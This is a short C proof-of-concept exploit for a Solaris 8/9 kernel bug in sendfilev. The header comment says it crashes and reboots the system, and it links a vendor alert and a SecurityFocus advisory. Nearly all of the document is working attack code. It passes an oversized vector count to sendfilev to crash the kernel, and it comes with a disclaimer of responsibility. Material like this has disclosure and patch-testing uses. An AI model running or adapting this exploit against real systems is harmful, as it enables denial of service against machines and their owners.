/* * Solaris 8/9 sendfilev PoC exploit code. * * Causes a DoS and the system will reboot. * * I'm not sure this just a DoS, because honestly * it smells somewhat like a buffer overflow. If * anyone figures out more, email me. * * Jon Hart * * $CC -o solaris-sendfilev-exploit solaris-sendfilev-exploit.c -lsendfile * * See: * * http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57470 * http://securityfocus.com/bid/10202/ * * I take no responsibility whatsoever for what you do * with this code. Use at your own risk. */ #include #include #include #include int main (int argc, char *argv[]) { ssize_t ret; size_t xfer; struct sendfilevec vec[1]; int fd = open("/tmp/.sendfile", O_RDWR | O_CREAT | O_TRUNC, 0600); vec[0].sfv_fd = open("/etc/hosts", O_RDONLY); vec[0].sfv_flag = 0; vec[0].sfv_off = 0; vec[0].sfv_len = 0; /* This where the DoS happens. Point it way too far into the vector, * which only has 1 entry in it. */ ret = sendfilev(fd, vec, 100, &xfer); }